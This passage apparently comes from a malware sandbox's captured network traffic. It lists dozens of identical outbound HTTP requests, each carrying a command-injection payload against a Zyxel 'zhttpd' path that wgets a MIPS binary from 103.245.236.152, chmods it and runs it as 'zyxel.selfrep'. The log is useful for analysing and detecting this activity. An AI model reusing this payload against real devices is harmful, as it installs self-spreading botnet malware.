                                      Jan 14, 2024 15:50:59.602106094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7714192.168.2.1456788211.241.21.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602153063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7715192.168.2.143664286.12.67.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602193117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7716192.168.2.1439772192.16.195.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602227926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7717192.168.2.1444474168.187.134.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602296114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7718192.168.2.144907459.248.173.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602332115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7719192.168.2.143839631.248.67.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602391005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7720192.168.2.1459742128.1.73.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602391958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7721192.168.2.146081450.75.226.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602438927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7722192.168.2.1453158201.31.51.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602475882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7723192.168.2.143910045.65.66.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602530956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7724192.168.2.145151299.87.129.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602561951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7725192.168.2.144838267.200.184.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602610111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7726192.168.2.145156850.12.11.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602643013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7727192.168.2.1445884172.255.244.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602675915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7728192.168.2.145373051.43.33.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602746964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7729192.168.2.1439516128.210.183.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602797985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7730192.168.2.1445014120.8.189.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602821112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7731192.168.2.1454326112.236.184.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602879047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7732192.168.2.1445540108.145.14.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602924109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7733192.168.2.146063423.176.9.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602945089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7734192.168.2.144676860.153.137.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603003025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7735192.168.2.1456052191.168.96.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603063107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7736192.168.2.145158846.229.161.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603104115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7737192.168.2.144060068.242.15.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603142977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7738192.168.2.146010493.17.157.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603190899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7739192.168.2.145052249.162.84.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603221893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7740192.168.2.1439356161.99.65.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603292942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7741192.168.2.1458040207.86.113.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603342056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7742192.168.2.1433924115.198.232.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603398085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7743192.168.2.1455524221.162.33.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603425980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7744192.168.2.1454710140.68.120.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603461027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7745192.168.2.143765041.180.248.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603498936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7746192.168.2.143900044.201.93.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603547096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7747192.168.2.1450926217.251.172.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603599072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7748192.168.2.143810446.22.110.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603657961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7749192.168.2.1441888105.211.174.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603704929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7750192.168.2.1449190145.65.249.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603746891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7751192.168.2.1452666190.4.178.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.603790998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7752192.168.2.144389075.16.55.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.605248928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7753192.168.2.145935623.122.245.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606470108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7754192.168.2.1456966173.144.218.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606555939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7755192.168.2.1451462195.32.189.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606584072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7756192.168.2.1450676162.36.125.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606650114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7757192.168.2.1460060132.226.46.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606714964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7758192.168.2.143761675.238.65.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606795073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7759192.168.2.1455264178.129.92.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606837988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7760192.168.2.144994292.88.152.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606885910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7761192.168.2.1435770117.167.4.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606936932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7762192.168.2.1433174158.237.247.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606955051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7763192.168.2.1453188148.22.205.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.606997013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7764192.168.2.1456244138.214.226.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.607057095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7765192.168.2.144300063.212.222.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.607121944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7766192.168.2.1460046180.138.227.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.607161045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7767192.168.2.1438212120.16.158.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.607217073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7768192.168.2.144165494.98.48.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.607245922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7769192.168.2.1444860182.242.66.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.607278109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7770192.168.2.1445066171.107.39.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.608789921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7771192.168.2.143507253.123.137.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.608839035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7772192.168.2.1442742147.119.125.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609055042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7773192.168.2.143757469.191.191.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609128952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7774192.168.2.1438796186.194.49.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609154940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7775192.168.2.1435312128.225.252.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609210968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7776192.168.2.1439472132.139.164.93443
                                      TimestampBytes transferredDirectionData
